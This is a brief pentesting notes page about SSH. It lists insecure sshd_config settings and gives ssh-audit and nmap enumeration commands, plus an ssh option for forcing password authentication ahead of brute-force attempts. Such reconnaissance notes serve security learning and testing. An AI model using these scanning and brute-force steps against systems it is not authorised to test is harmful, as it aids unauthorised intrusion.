22 - Pentesting SSH

Resources :

Hacktricks .

Secure Shell (SSH) enables two computers to establish an encrypted and direct connection within a possibly insecure network on the standard port TCP 22.

Default Configuration

cat /etc/ssh/sshd_config  | grep -v "#" | sed -r '/^\s*$/d'
## DANGERIOUS SETTINGS
PasswordAuthentication yes	#Allows password-based authentication.
PermitEmptyPasswords yes	#Allows the use of empty passwords.
PermitRootLogin yes	#Allows to log in as the root user.
Protocol 1	#Uses an outdated version of encryption.
X11Forwarding yes	#Allows X11 forwarding for GUI applications.
AllowTcpForwarding yes	#Allows forwarding of TCP ports.
PermitTunnel	#Allows tunneling.
DebianBanner yes	#Displays a specific banner when logging in.

Footprinting SSH

One of the tools we can use to fingerprint the SSH server is ssh-audit. It checks the client-side and server-side configuration and shows some general information and which encryption algorithms are still used by the client and server.

git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
./ssh-audit.py 10.129.14.132

For potential brute-force attacks, we can specify the authentication method with the SSH client option PreferredAuthentications.

ssh -v staphy@IP -o PreferredAuthentications=password

Nmap Scripts

nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms 
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Previous21 - Pentesting FTP Next25,465,587 - Pentesting SMTP

Last updated 3 years ago